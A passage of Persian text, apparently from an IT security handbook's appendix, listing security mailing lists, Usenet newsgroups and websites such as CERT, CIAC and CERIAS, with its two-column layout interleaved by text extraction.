‫ﻓﻬﺮﺳــﺖ ﭘــﺴﺘﻲ ﺍﺳــﺖ‪ .‬ﺍﮔــﺮ ﺍﺯ ﺧــﺪﻣﺎﺕ ‪ Usenet‬ﺍﺳــﺘﻔﺎﺩﻩ‬ ‫ﻣﺤﻠﻬﺎﻱ ﻣﺘﻌﺪﺩﻱ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺑﺎﻳﮕﺎﻧﻲ ﺷﺪﻩ ﺍﺳـﺖ‪ ،‬ﺍﺯ ﺟﻤﻠـﻪ ﺩﺭ‬
‫ﻧﻤــــﻲﻛﻨﻴــــﺪ )ﻭ ﻧﻤــــﻲﺧﻮﺍﻫﻴــــﺪ ﭘﻴﺎﻣﻬــــﺎ ﺭﺍ ﺍﺯ ﭘﺎﻳﮕــــﺎﻩ ﻭﺏ‬
‫ﺁﺩﺭﺱ ﺯﻳﺮ‪:‬‬
‫‪ http://groups.google.com‬ﺩﺭﻳﺎﻓﺖ ﻭ ﻣﻄﺎﻟﻌﻪ ﻧﻤﺎﻳﻴـﺪ( ﻣـﻲ ﺗﻮﺍﻧﻴـﺪ‬ ‫‪http://sun.soci.niu.edu/~cudigest‬‬
‫ﺩﺭﺧﻮﺍﺳــﺖ ﻋــﻀﻮﻳﺖ ﺧــﻮﺩ ﺭﺍ ﺑــﻪ ﺁﺩﺭﺱ ﭘــﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ‬
‫‪Firewalls‬‬
‫‪ risks-request@csl.sri.com‬ﺑﻔﺮﺳـــــﺘﻴﺪ ﻭ ﻛﻠﻤـــــﺔ‬
‫ﻓﻬﺮﺳﺖ ﭘـﺴﺘﻲ "ﺩﻳـﻮﺍﺭﻩﻫـﺎﻱ ﺁﺗـﺶ" )‪ (firewalls‬ﻛـﻪ ﺗﻮﺳـﻂ‬
‫"‪ "subscribe‬ﺭﺍ ﺩﺭ ﻣﺘﻦ ﺁﻥ ﻗﺮﺍﺭ ﺩﻫﻴﺪ‪.‬‬
‫ﻛﻨﺴﺮﺳﻴﻮﻡ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ ﻣﺪﻳﺮﻳﺖ ﻭ ﻣﻴﺰﺑﺎﻧﻲ ﻣـﻲﺷـﻮﺩ‬
‫ﻣﻮﺿـﻮﻋﺎﺗﻲ ﻛـﻪ ﺩﺭ ﮔﺬﺷـﺘﻪ ﺩﺭ ﺍﻳـﻦ ﻓﻬﺮﺳـﺖ ﭘـﺴﺘﻲ ﻣﻄــﺮﺡ‬
‫ﻣﺤﻞ ﺗﺒﺎﺩﻝ ﻧﻈﺮ ﺍﻓﺮﺍﺩﻱ ﺍﺳﺖ ﻛـﻪ ﻣﺎﻳﻠﻨـﺪ ﺩﺭ ﻣـﻮﺭﺩ ﻃﺮﺍﺣـﻲ‪،‬‬
‫ﺷﺪﻩﺍﻧﺪ ﻧﻴﺰ ﺩﺭ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ ‪) google‬ﺁﺩﺭﺱ ﻓـﻮﻕ( ﻭ ﻳـﺎ ﭘﺎﻳﮕـﺎﻩ‬
‫ﺗﻮﻟﻴﺪ‪ ،‬ﻋﻤﻠﻜﺮﺩ‪ ،‬ﻧﮕﻬﺪﺍﺭﻱ ﻭ ﻓﻠﺴﻔﺔ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺩﻳـﻮﺍﺭﺓ‬
‫ﻭﺏ ‪ http://www.risks.org‬ﻣﻮﺟﻮﺩ ﻣﻲﺑﺎﺷﻨﺪ‪.‬‬
‫ﺁﺗﺶ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺑﺤﺚ ﻧﻤﺎﻳﻨﺪ‪ .‬ﺑﺮﺍﻱ ﻋـﻀﻮﻳﺖ ﺩﺭ ﺍﻳـﻦ ﻓﻬﺮﺳـﺖ‬
‫‪SANS Security Alert Consensus‬‬ ‫ﭘﺴﺘﻲ ﺑﻪ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺯﻳﺮ ﻣﺮﺍﺟﻌﻪ ﻧﻤﺎﻳﻴﺪ‪:‬‬
‫ﺍﻳــﻦ ﻓﻬﺮﺳــﺖ ﭘــﺴﺘﻲ ﻳــﻚ ﭼﻜﻴــﺪﺓ ﻫﻔﺘﮕــﻲ ﺍﺯ ﺍﻋــﻼﻥﻫــﺎ ﻭ‬ ‫‪http://www.isc.org/services/public/lists/firewa‬‬
‫‪lls.html‬‬
‫ﻫﺸﺪﺍﺭﻫﺎﻱ ﻓﻬﺮﺳﺘﻬﺎﻱ ﭘﺴﺘﻲ ﻭ ﻓﺮﻭﺷـﻨﺪﮔﺎﻥ ﻣﺨﺘﻠـﻒ ﺍﺳـﺖ‪.‬‬
‫ﻋﻀﻮﻳﺖ ﺩﺭ ﺍﻳﻦ ﻓﻬﺮﺳﺖ ﭘﺴﺘﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺗﻨﻬﺎ ﺑﻪ ﻣﺴﺎﺋﻞ ﻣﺮﺑﻮﻁ‬ ‫ﻻ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩ ﺍﺳﺖ )ﻣﻌﻤﻮ ﹰ‬
‫ﻻ ﺩﺭ‬ ‫ﭘﻴﺎﻣﻬﺎﻱ ﺍﻳﻦ ﻓﻬﺮﺳﺖ ﭘﺴﺘﻲ ﻣﻌﻤﻮ ﹰ‬
‫ﺑﻪ ﻳﻚ ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ ﺧـﺎﺹ ﻣﺤـﺪﻭﺩ ﺷـﻮﺩ‪ .‬ﺑـﺮﺍﻱ ﻋـﻀﻮﻳﺖ‪،‬‬ ‫ﺣﺪ ﺩﻫﻬﺎ ﭘﻴﺎﻡ ﺩﺭ ﺭﻭﺯ ﻛﻪ ﮔﺎﻫﻲ ﺑﻪ ﺑﻴﺶ ﺍﺯ ﺻﺪﻫﺎ ﭘﻴﺎﻡ ﻫﻢ ﻣﻲﺭﺳﺪ(‪ .‬ﺑﺮﺍﻱ‬
‫ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ‪ http://sans.org‬ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ‪.‬‬ ‫ﺭﺍﺿﻲ ﻧﮕﻬﺪﺍﺷﺘﻦ ﺍﻋﻀﺎﻳﻲ ﻛـﻪ ﻧﻤـﻲﺧﻮﺍﻫﻨـﺪ ﺻـﻨﺪﻭﻕ ﭘـﺴﺖ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲﺷﺎﻥ ﻣﻤﻠﻮ ﺍﺯ ﭘﻴﺎﻣﻬﺎﻱ ﻣﺨﺘﻠﻒ ﺍﻳﻦ ﻓﻬﺮﺳﺖ ﭘـﺴﺘﻲ‬
‫ﮔﺮﻭﻩﻫﺎﻱ ‪Usenet‬‬ ‫ﺑﺎﺷﺪ‪ ،‬ﮔﺰﻳﻨـﻪﺍﻱ ﺑـﺮﺍﻱ ﺍﺭﺳـﺎﻝ ﻳـﻚ ﻧـﺴﺨﺔ ﺧﻼﺻـﻪﺷـﺪﻩ ﺍﺯ‬
‫ﭘﻴﺎﻣﻬﺎﻱ ﻫﺮ ﺭﻭﺯ ﻧﻴﺰ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻭ ﺍﺻـﻞ ﭘﻴﺎﻣﻬـﺎ ﺩﺭ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ‬
‫ﮔﺮﻭﻩﻫﺎﻱ ﺧﺒﺮﻱ ﻣﺘﻌﺪﺩﻱ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ‬
‫ﺑﺎﻳﮕﺎﻧﻲ ﻣﻲﮔﺮﺩﺩ‪.‬‬
‫ﺑﺨﺶ ﺷﺸﻢ‬

‫ﻣﻨﺎﺑﻊ ﺧﻮﺑﻲ ﺩﺭ ﻣﻮﺭﺩ ﺍﻣﻨﻴﺖ ﺷﺒﻜﻪ ﻭ ﻣﻮﺿﻮﻋﺎﺕ ﻣﺮﺗﺒﻂ ﺑﺎﺷـﻨﺪ‪.‬‬


‫ﺍﻣﺎ ﺩﺭ ﻋﻴﻦ ﺣﺎﻝ ﻓﻬﺮﺳﺘﻬﺎﻱ ﭘﺴﺘﻲ ﺑـﺪﻭﻥ ﺳـﺮﺩﺑﻴﺮ )ﻛـﻪ ﺩﺭ ﺁﻧﻬـﺎ‬ ‫‪Firewall-Wizards‬‬
‫ﻫﺮﻳﻚ ﺍﺯ ﺍﻋﻀﺎ ﻣﺠﺎﺯ ﺑﻪ ﺍﺭﺳﺎﻝ ﭘﻴﺎﻡ ﺍﺳﺖ( ﺑﻴﺶ ﺍﺯ ﮔﺮﻭﻫﻬﺎﻱ ﺧﺒـﺮﻱ‬ ‫ﻳﻚ ﻓﻬﺮﺳﺖ ﭘﺴﺘﻲ ﻛﻪ ﺍﺭﺳﺎﻝ ﭘﻴﺎﻡ ﺩﺭ ﺁﻥ ﻧﻴﺎﺯ ﺑﻪ ﺗﺄﻳﻴﺪ ﺳﺮﺩﺑﻴﺮ‬
‫ﺑــﺪﻭﻥ ﺳــﺮﺩﺑﻴﺮ ﺩﺭﺩﺳــﺮ ﺩﺍﺭﻧــﺪ‪ :‬ﻣﺠﻤﻮﻋــﻪﺍﻱ ﺍﺯ ﻣﻮﺿــﻮﻋﺎﺕ‬ ‫ﺁﻥ ﺩﺍﺭﺩ ﻭ ﻧﻪﺗﻨﻬﺎ ﺑﻪ ﻣﺴﺎﺋﻞ ﻣﺮﺑﻮﻁ ﺑﻪ ﻃﺮﺍﺣـﻲ ﻭ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ‬
‫ﻛﻢﺍﻫﻤﻴﺖ‪ ،‬ﺗﻜﺮﺍﺭﻱ‪ ،‬ﻭ ﺑﻌﻀﹰﺎ ﻧﺎﺻـﺤﻴﺢ‪ .‬ﺍﻳـﻦ ﻧﮕﺮﺍﻧـﻲ ﺍﺯ ﺑﺎﺑـﺖ‬ ‫ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ ﻣﻲﭘﺮﺩﺍﺯﺩ‪ ،‬ﺑﻠﻜﻪ ﺳﺎﻳﺮ ﻋﻨﺎﻭﻳﻦ ﻣﻬﻢ ﺩﺭ ﺍﻣﻨﻴـﺖ‬
‫ﻼ ﻫﻢ ﺑـﻪ‬ ‫ﻣﻄﺎﻟﺒﻲ ﻛﻪ ﺩﺭ ﻓﻬﺮﺳﺘﻬﺎﻱ ﭘﺴﺘﻲ ﻳﺎﻓﺖ ﻣﻲﺷﻮﺩ ﻭ ﻗﺒ ﹰ‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٤٨٢‬‬

‫‪microsoft.public.security,‬‬ ‫ﺁﻥ ﺍﺷﺎﺭﻩ ﺷﺪ‪ ،‬ﺩﺭﺧﺼﻮﺹ ﮔﺮﻭﻩ ﻫـﺎﻱ ﺧﺒـﺮﻱ ﺑﻄـﻮﺭ ﻣـﻀﺎﻋﻒ‬
‫‪microsoft.public.win2000.security,‬‬
‫‪microsoft.public.windowsxp.security_admin‬‬ ‫ﺻﺪﻕ ﻣﻲﻛﻨﺪ‪.‬‬

‫ﭘﺎﻳﮕﺎﻩﻫﺎﻱ ﻭﺏ‬ ‫ﺍﻃﻼﻋﻴﻪﻫﺎﻳﻲ ﺩﺭ ﻣﻮﺭﺩ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪ‪ ،‬ﺷﺎﻣﻞ ﭘﻴـﺸﻨﻬﺎﺩﺍﺕ ﺟﺪﻳـﺪ‬


‫ﻣﺮﻛﺰ ﻫﻤﺎﻫﻨﮕﻴﻬﺎﻱ ‪) CERT‬ﺍﺭﺳﺎﻝ ﻣﻄﺎﻟﺐ ﺗﻨﻬﺎ ﺑﺎ ﺗﺄﻳﻴﺪ ﺳﺮﺩﺑﻴﺮ(‪:‬‬
‫ﻫﺰﺍﺭﺍﻥ ﺻﻔﺤﺔ ﻭﺏ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺩﺭ ﻫﺮﻳﻚ ﺍﺯ ﺁﻧﻬﺎ ﺁﺩﺭﺳﻬﺎﻳﻲ‬ ‫‪comp.security.announce‬‬
‫ﺑﺮﺍﻱ ﻣﺮﺍﺟﻊ ﺩﻳﮕﺮ ﻧﻴﺰ ﭘﻴﺪﺍ ﻣﻲﺷﻮﺩ‪ .‬ﺑﺮﺧـﻲ ﺍﺯ ﺻـﻔﺤﺎﺕ ﺑـﺴﻴﺎﺭ‬
‫ﺍﻣﻨﻴﺖ ‪:UNIX‬‬
‫ﺟﺎﻣﻊ ﻫﺴﺘﻨﺪ ﻭ ﺑﺮﺧﻲ ﺩﻳﮕﺮ ﻣﻄﺎﻟﺐ ﻛﻤﺘﺮﻱ ﺩﺭ ﺑﺮ ﺩﺍﺭﻧﺪ‪ .‬ﺁﻧﭽـﻪ‬ ‫‪comp.security.unix‬‬
‫ﺩﺭ ﻓﻬﺮﺳﺖ ﺯﻳﺮ ﻣﻮﺭﺩ ﺍﺷﺎﺭﻩ ﻗﺮﺍﺭ ﺩﺍﺩﻩﺍﻳﻢ ﻧﻘﻄﺔ ﺷـﺮﻭﻉ ﻣﻨﺎﺳـﺒﻲ‬
‫ﺑﺮﺍﻱ ﺁﻏﺎﺯ ﺟﺴﺘﺠﻮ ﺍﺳﺖ‪ .‬ﻫﻤﭽﻨﻴﻦ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻦ ﻣﺠﻤﻮﻋـﻪ‬ ‫ﻣﻄﺎﻟﺐ ﻣﺘﻔﺮﻗﻪ ﺩﺭ ﺍﺭﺗﺒﺎﻁ ﺑﺎ ﺍﻣﻨﻴﺖ ﺷﺒﻜﻪ ﻭ ﺭﺍﻳﺎﻧﻪ‪:‬‬
‫‪comp.security.misc‬‬
‫ﻣﻲﺗﻮﺍﻧﻴﺪ ﺯﻳﺮﺷﺎﺧﻪﻫﺎﻱ ﺩﻳﮕﺮﻱ ﺑﻴﺎﺑﻴﺪ )ﻛﻪ ﺑﻪ ﻳﻚ ﻳﺎ ﭼﻨﺪ ﺗﺎ ﺍﺯ ﺍﻳـﻦ‬
‫ﺻﻔﺤﺎﺕ ﻣﺘﺼﻞ ﻫﺴﺘﻨﺪ( ﻭ ﺍﺯ ﺍﻳﻦ ﻃﺮﻳﻖ ﺑﺮﺍﻱ ﺧﻮﺩ ﻳـﻚ ﻓﻬﺮﺳـﺖ‬
‫ﺭﺍﻫﻨﻤﺎ ﺗﻬﻴﻪ ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫ﺍﻃﻼﻋﺎﺗﻲ ﺩﺭ ﻣﻮﺭﺩ ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ‪:‬‬
‫‪٥٠٣‬‬
‫‪) CIAC‬ﻣﺸﺎﻭﺭﻳﻦ ﺭﺧﺪﺍﺩ ﺭﺍﻳﺎﻧﻪﺍﻱ(‬ ‫‪comp.security.firewalls‬‬
‫ﻛﺎﺭﻣﻨﺪﺍﻥ ‪ CIAC‬ﻳﻚ ﺑﺎﻳﮕﺎﻧﻲ ﺧﻮﺏ ﻭ ﻣﺠﻬﺰ ﺍﺯ ﺍﺑﺰﺍﺭﻫﺎ ﻭ‬
‫ﺍﻃﻼﻋــﺎﺗﻲ ﺩﺭ ﺧــﺼﻮﺹ ﻭﻳﺮﻭﺳــﻬﺎﻱ ﺭﺍﻳﺎﻧــﻪﺍﻱ ﻭ ﻣﻮﺿــﻮﻋﺎﺕ‬
‫ﻣﺴﺘﻨﺪﺍﺕ ﺭﺍ ﺩﺭ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺧﻮﺩ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﻛﺮﺩﻩﺍﻧﺪ‪ .‬ﺍﻳﻦ‬
‫ﻣﺮﺗﺒﻂ )ﺍﺭﺳﺎﻝ ﻣﻄﺎﻟﺐ ﺗﻨﻬﺎ ﺑﺎ ﺗﺄﻳﻴﺪ ﺳﺮﺩﺑﻴﺮ(‪:‬‬
‫ﺑﺎﻳﮕﺎﻧﻲ ﺷﺎﻣﻞ ﻧﺴﺨﻪﺍﻱ ﺍﺯ ﻧﻜﺎﺕ ﻭ ﭘﻴﺸﻨﻬﺎﺩﺍﺕ ﺁﻧﻬﺎ ﻭ ﻫﻤﭽﻨﻴﻦ‬
‫‪comp.virus‬‬
‫ﺑﺮﺧﻲ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺤﻠﻲ ﻣﻲﺑﺎﺷﺪ‪:‬‬
‫‪http://ciac.llnl.gov‬‬ ‫ﻣﻮﺿﻮﻋﺎﺕ ﻣﺮﺗﺒﻂ ﺑﺎ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺭﺍﻫﺒﺮﻱ ﺭﺍﻳﺎﻧﻪ‪ ،‬ﺍﺯ ﺟﻤﻠﻪ ﺍﻣﻨﻴﺖ‪:‬‬

‫‪) CERIAS‬ﻣﺮﻛــﺰ ﺑﻴﻤــﻪ ﻭ ﺍﻳﻤﻨــﻲ ﺍﻃﻼﻋــﺎﺕ ﺁﻣﻮﺯﺷــﻲ ﻭ‬ ‫‪comp.admin.policy‬‬


‫‪٥٠٤‬‬
‫ﺗﺤﻘﻴﻘﺎﺗﻲ(‬
‫ﻧﻜﺎﺕ ﻣﻬﻢ ﺩﺭ ‪ ،TCP/IP‬ﺍﺯ ﺟﻤﻠﻪ ﺍﻣﻨﻴﺖ ﺁﻥ‪:‬‬
‫ﺟﺎﻧﺸﻴﻦ ﻣﻮﺳﺴﺔ ﻋﻤﻠﻴﺎﺕ‪ ،‬ﻣﻤﻴﺰﻱ ﻭ ﻓﻨﺎﻭﺭﻱ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪ ﺍﻱ‬
‫‪comp.protocols.tcp-ip‬‬
‫)‪ ٥٠٥(COAST‬ﺍﺳﺖ ﻛﻪ ﻳﻚ ﻣﺮﻛﺰ ﺗﺤﻘﻴﻘﺎﺗﻲ ﺩﺭ ﺯﻣﻴﻨـﺔ ﺍﻣﻨﻴـﺖ‬
‫ﺍﻃﻼﻋﺎﺕ ﻭ ﺁﻣﻮﺯﺵ ﺩﺭ ﺩﺍﻧﺸﮕﺎﻩ ‪ Purdue‬ﻣﻲﺑﺎﺷﺪ‪ .‬ﺍﻳﻦ ﻣﺮﻛﺰ‬ ‫ﻣﻮﺿﻮﻋﺎﺕ ﻣـﺮﺗﺒﻂ ﺑـﺎ ﺭﺍﻫﺒـﺮﻱ ﺳﻴـﺴﺘﻤﻬﺎﻱ ‪ ،Unix‬ﺍﺯ ﺟﻤﻠـﻪ‬
‫ﺍﺭﺗﺒﺎﻁ ﺗﻨﮕﺎﺗﻨﮕﻲ ﺑﺎ ﻣﺤﻘﻘﺎﻥ ﻭ ﻣﻬﻨﺪﺳـﺎﻥ ﺷـﺮﻛﺘﻬﺎﻱ ﺑـﺰﺭﮒ ﻭ‬ ‫ﺍﻣﻨﻴﺖ‪:‬‬
‫ﻣﺆﺳــﺴﺎﺕ ﺩﻭﻟﺘــﻲ ﺩﺍﺭﺩ‪ .‬ﻓﻌﺎﻟﻴــﺖ ﻓﻌﺎﻟﻴﺘﻬــﺎﻱ ‪ CERIAS‬ﺑــﺮ‬ ‫‪comp.unix.admin‬‬
‫ﻧﻴﺎﺯﻫﺎﻱ ﺗﺤﻘﻴﻘﺎﺗﻲ ﻭ ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻱ ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﻣﺘﻤﺮﻛﺰ ﺍﺳﺖ‪.‬‬ ‫ﻣﺒﺎﺣﺜﻲ ﭘﻴﺮﺍﻣﻮﻥ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻭ ﻛﺎﺭﺑﺮﺩﻫﺎﻱ ﺁﻥ‪:‬‬
‫‪sci.cypt‬‬
‫ﺍﺯ ﻣﻨﻈﺮ ﺗﺎﺭﻳﺨﻲ‪ ،‬ﺍﻳﻦ ﻣﺮﻛﺰ ﺩﺭﺑﺮﮔﻴﺮﻧﺪﺓ ﻗﺪﻳﻤﻲﺗﺮﻳﻦ ﺑﺎﻳﮕﺎﻧﻲ ﺍﺯ‬
‫ﺍﺑﺰﺍﺭﻫﺎ ﻭ ﻣﺮﺍﺟﻊ ﺍﻣﻨﻴﺘﻲ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺩﺭ ﺍﻳﻨﺘﺮﻧـﺖ ﺍﺳـﺖ‪ .‬ﺍﻳـﻦ‬ ‫ﺗﺤﻘﻴﻘﺎﺗﻲ ﭘﻴﺮﺍﻣﻮﻥ ﺭﻣﺰﻧﮕﺎﺭﻱ )ﺍﺭﺳﺎﻝ ﻣﻄﺎﻟﺐ ﺗﻨﻬﺎ ﺑﺎ ﺗﺄﻳﻴﺪ ﺳﺮﺩﺑﻴﺮ(‪:‬‬
‫ﻣﺮﻛﺰ ﺩﺭ ﺳﺎﻝ ‪ ۱۹۸۹‬ﺑﻪ ﻋﻨﻮﺍﻥ ﺗﻨﻬﺎ ﻳﻚ ﭘﺎﻳﮕـﺎﻩ ‪ FTP‬ﺑﻮﺟـﻮﺩ‬ ‫‪sci.crypt.research‬‬
‫ﺁﻣﺪ ﻭ ﻛﺎﺭ ﺧﻮﺩ ﺭﺍ ﺑﺎ ﺑﺎﻳﮕﺎﻧﻲ ﻛﺮﺩﻥ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺿـﺪﻭﻳﺮﻭﺱ ﺁﻏـﺎﺯ‬
‫ﺍﺗﺎﻕ ﮔﻔﺘﮕﻮﻱ ‪ ACM‬ﻛﻪ ﭘﻴﺸﺘﺮ ﺑﻪ ﺁﻥ ﺍﺷﺎﺭﻩ ﺷﺪ )ﺍﺭﺳﺎﻝ ﻣﻄﺎﻟـﺐ‬
‫ﻛﺮﺩ ﻭ ﺑﺘﺪﺭﻳﺞ ﺣﻴﻄﺔ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺍﻧﻮﺍﻉ ﭘﻮﻳـﺸﮕﺮﻫﺎ‪ ،‬ﺩﻳـﻮﺍﺭﻩﻫـﺎﻱ‬
‫ﺗﻨﻬﺎ ﺑﺎ ﺗﺄﻳﻴﺪ ﺳﺮﺩﺑﻴﺮ(‪:‬‬
‫ﺁﺗﺶ ﻭ ﻣﺴﺘﻨﺪﺍﺕ ﻣﺨﺘﻠﻒ ﮔﺴﺘﺮﺵ ﺩﺍﺩ‪ .‬ﺍﻳﻦ ﭘﺎﻳﮕﺎﻩ ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ‬ ‫‪comp.risk‬‬

‫ﺷﺮﻛﺖ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺩﺍﺭﺍﻱ ﺩﻫﻬﺎ ﮔـﺮﻭﻩ ﺧﺒـﺮﻱ ﺩﺭ ﺍﺭﺗﺒـﺎﻁ ﺑـﺎ‬


‫‪503 Computer Incident Advisory Capability‬‬
‫‪504 Center for Edueation and Research in Information‬‬ ‫ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ ﻭ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﺧـﻮﺩ ﺍﺳـﺖ‪ ،‬ﻛـﻪ ﺍﺯ ﺁﻥ‬
‫‪Assurance and Security‬‬
‫‪505 Computer Operations,Audit, and Security‬‬ ‫ﺟﻤﻠﻪﺍﻧﺪ ﻣﻮﺍﺭﺩ ﺯﻳﺮ‪:‬‬
‫‪Technology‬‬
‫‪٤٨٣‬‬ ‫ﭘﻴﻮﺳﺘﻬﺎ‬

‫‪٥٠٨‬‬
‫‪) NIH‬ﻣﺆﺳﺴﺎﺕ ﻣﻠﻲ ﺳﻼﻣﺘﻲ(‬ ‫ﺍﺯ ﺳﻴــﺴﺘﻢ ‪ gopher‬ﻭ ﺳــﺮﻭﻳﺲﺩﻫﻨــﺪﻩﻫــﺎﻱ ﻭﺏ ﻭ ﺍﺯ ﻳــﻚ‬
‫ﺻــﻔﺤﺔ ﻭﺏ ﺍﺻــﻠﻲ ‪ NIH‬ﻣﺠﻤﻮﻋــﺔ ﻭﺳــﻴﻌﻲ ﺍﺯ ﺁﺩﺭﺳــﻬﺎﻱ‬ ‫ﺑﺎﻳﮕﺎﻧﻲ ﺷﺨﺼﻲ )ﻣﺘﻌﻠﻖ ﺑﻪ ‪ (Spafford‬ﺁﻏـﺎﺯ ﺑـﻪ ﻛـﺎﺭ ﻛـﺮﺩ‪ ،‬ﺑـﻪ‬
‫ﺍﻳﻨﺘﺮﻧﺘﻲ ﻣﺮﺑﻮﻁ ﺑﻪ ﺳﺎﻳﺮ ﻣﻨﺎﺑﻊ ﻭ ﺑﺎﻳﮕﺎﻧﻲﻫﺎﻱ ﺭﺍ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﺪ‪:‬‬ ‫ﺑﺎﻳﮕﺎﻧﻲ ﺁﺯﻣﺎﻳﺸﮕﺎﻩ ‪ COAST‬ﺗﺒﺪﻳﻞ ﺷﺪ‪ ،‬ﻭ ﺳﭙﺲ ﺑﻪ ﺑﺎﻳﮕـﺎﻧﻲ‬
‫‪http://www.alw.nih.gov/security/‬‬ ‫ﻓﻌﻠﻲ ﻳﻌﻨﻲ ‪ CERIAS‬ﻣﺒﺪﻝ ﮔﺸﺖ‪ .‬ﺍﻳﻦ ﻣﺮﻛـﺰ ﺩﺭ ﺩﻫـﺔ ﺍﻭﻝ‬
‫ﻓﻌﺎﻟﻴﺖ ﺧـﻮﺩ ﺑﻌﻨـﻮﺍﻥ ﺑﺰﺭﮔﺘـﺮﻳﻦ ﺑﺎﻳﮕـﺎﻧﻲ ﻣﻄﺎﻟـﺐ ﺍﻣﻨﻴﺘـﻲ ﺩﺭ‬
‫ﻣﻨﺎﺑﻊ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ‬ ‫ﺍﻳﻨﺘﺮﻧﺖ ﺷﻨﺎﺧﺘﻪ ﻣﻲﺷﺪ‪.‬‬

‫ﺩﺭ ﺍﻳﻦ ﻗﺴﻤﺖ ﺑﻪ ﻣﻌﺮﻓﻲ ﺑﺮﺧﻲ ﺍﺑﺰﺍﺭﻫﺎ ﻭ ﺑﺴﺘﻪﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ‬ ‫ﻃﻲ ﺳﺎﻟﻴﺎﻥ ﺍﺧﻴﺮ‪ ،‬ﺍﻳﻦ ﺑﺎﻳﮕﺎﻧﻲ ﻭ ﺑﺮﺧﻲ ﻓﻬﺮﺳـﺘﻬﺎ ﺑـﻪ ﻧـﻮﻋﻲ ﺍﺯ‬
‫ﻗﺎﺑﻞ ﺩﺳﺘﺮﺱ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﻣﻲﭘﺮﺩﺍﺯﻳﻢ ﻛﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺮﺍﻱ ﺗﺄﻣﻴﻦ‬ ‫ﻫﻢ ﺍﻧﺸﻌﺎﺏ ﻳﺎﻓﺘﻪﺍﻧﺪ ﻭ ﻧﺴﺒﺖ ﺑﻪ ﮔﺬﺷﺘﻪ ﻣﻄﺎﻟﺐ ﻛﻤﺘـﺮﻱ ﺭﻭﻱ‬
‫ﺍﻣﻨﻴﺖ ﭘﺎﻳﮕﺎﻩﻫﺎﻱ ﻭﺏ ﻣﻔﻴﺪ ﻭﺍﻗﻊ ﺷﻮﻧﺪ‪ .‬ﮔﺮﭼﻪ ﺍﻳﻦ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎ‬ ‫ﺁﻧﻬﺎ ﻣﻨﺘﺸﺮ ﻣﻲ ﺷﻮﺩ )ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﺗﺠﺎﺭﻱ ﺩﺍﺭﺍﻱ ﻣﻨـﺎﺑﻌﻲ‬
‫ﺭﺍﻳﮕﺎﻥ ﻫﺴﺘﻨﺪ‪ ،‬ﺍﻣﺎ ﺑﺨﺸﻲ ﺍﺯ ﺁﻧﻬـﺎ ﺑـﻪ ﻃـﺮﻕ ﻣﺨﺘﻠـﻒ ﺗﻮﺳـﻂ‬ ‫ﻫﺴﺘﻨﺪ ﻛﻪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﻬﺎ ﻭ ﭘﺮﺩﺍﺧﺖ ﻛﺎﺭﻣﺰﺩ ﺑﻪ ﻳﻚ ﻣﺘـﺼﺪﻱ‪ ،‬ﺑﺎﻳﮕـﺎﻧﻲ‬
